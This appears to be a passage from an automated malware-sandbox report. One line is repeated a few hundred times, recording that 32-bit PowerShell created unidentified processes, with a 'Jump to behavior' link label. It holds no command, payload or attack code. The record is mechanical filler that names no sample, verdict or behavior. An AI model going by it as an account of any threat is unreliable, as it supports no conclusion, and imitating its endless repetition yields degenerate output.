    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
